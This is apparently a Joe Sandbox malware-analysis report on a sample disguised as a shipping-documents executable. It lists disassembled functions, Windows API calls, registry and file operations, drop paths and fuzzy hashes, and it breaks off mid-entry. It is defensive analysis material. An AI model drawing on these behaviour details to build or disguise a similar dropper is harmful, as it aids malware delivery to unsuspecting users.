                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
                                        • API String ID: 2531174081-4233364125
                                        • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                        • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                        • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8
                                        Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 846 4068db-4068fb GetSystemDirectoryW 847 4068fd 846->847 848 4068ff-406901 846->848 847->848 849 406912-406914 848->849 850 406903-40690c 848->850 852 406915-406948 wsprintfW LoadLibraryExW 849->852 850->849 851 40690e-406910 850->851 851->852
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                        • wsprintfW.USER32 ref: 0040692D
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%S.dll$UXTHEME
                                        • API String ID: 2200240437-1106614640
                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                        • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8
                                        Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 853 402eae-402ed7 call 4063c4 855 402edc-402ee0 853->855 856 402f91-402f95 855->856 857 402ee6-402eea 855->857 858 402eec-402f0d RegEnumValueW 857->858 859 402f0f-402f22 857->859 858->859 860 402f76-402f84 RegCloseKey 858->860 861 402f4b-402f52 RegEnumKeyW 859->861 860->856 862 402f24-402f26 861->862 863 402f54-402f66 RegCloseKey call 40694b 861->863 862->860 865 402f28-402f3c call 402eae 862->865 869 402f86-402f8c 863->869 870 402f68-402f74 RegDeleteKeyW 863->870 865->863 871 402f3e-402f4a 865->871 869->856 870->856 871->861
                                        APIs
                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                        Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 872 401c48-401c68 call 402d89 * 2 877 401c74-401c78 872->877 878 401c6a-401c71 call 402dab 872->878 880 401c84-401c8a 877->880 881 401c7a-401c81 call 402dab 877->881 878->877 884 401cd8-401d02 call 402dab * 2 FindWindowExW 880->884 885 401c8c-401ca8 call 402d89 * 2 880->885 881->880 897 401d08 884->897 895 401cc8-401cd6 SendMessageW 885->895 896 401caa-401cc6 SendMessageTimeoutW 885->896 895->897 898 401d0b-401d0e 896->898 897->898 899 401d14 898->899 900 402c2f-402c3e 898->900 899->900
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                        • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                        Function 0040248F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 903 40248f-4024c0 call 402dab * 2 call 402e3b 910 4024c6-4024d0 903->910 911 402c2f-402c3e 903->911 912 4024d2-4024df call 402dab lstrlenW 910->912 913 4024e3-4024e6 910->913 912->913 916 4024e8-4024f9 call 402d89 913->916 917 4024fa-4024fd 913->917 916->917 921 40250e-402522 RegSetValueExW 917->921 922 4024ff-402509 call 4032b9 917->922 923 402524 921->923 924 402527-402608 RegCloseKey 921->924 922->921 923->924 924->911 928 402933-40293a 924->928 928->911
                                        APIs
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000023,00000011,00000002), ref: 004024DA
                                        • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 0040251A
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,00000011,00000002), ref: 00402602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 2655323295-3576001853
                                        • Opcode ID: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                        • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                        • Opcode Fuzzy Hash: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                        • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                        Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00406094
                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-1857211195
                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                        • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                        Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                          • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                          • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform\Baroco,?,00000000,000000F0), ref: 00401652
                                        Strings
                                        • C:\Users\user\AppData\Local\acneform\Baroco, xrefs: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\acneform\Baroco
                                        • API String ID: 1892508949-727163374
                                        • Opcode ID: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                        • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                        • Opcode Fuzzy Hash: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                        • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                        Function 00406425 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
                                        • RegCloseKey.KERNELBASE(?), ref: 00406476
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Exec
                                        • API String ID: 3356406503-459137531
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                        Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
                                        • Opcode Fuzzy Hash: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                        • Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D
                                        Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Exec
                                        • API String ID: 3394109436-459137531
                                        • Opcode ID: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                        • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                        • Opcode Fuzzy Hash: fb5b9ebeaad3a79f54b281eda5c862824b880451e65e455491233296c99b22fc
                                        • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                        Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • lstrlenW.KERNEL32 ref: 00402344
                                        • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
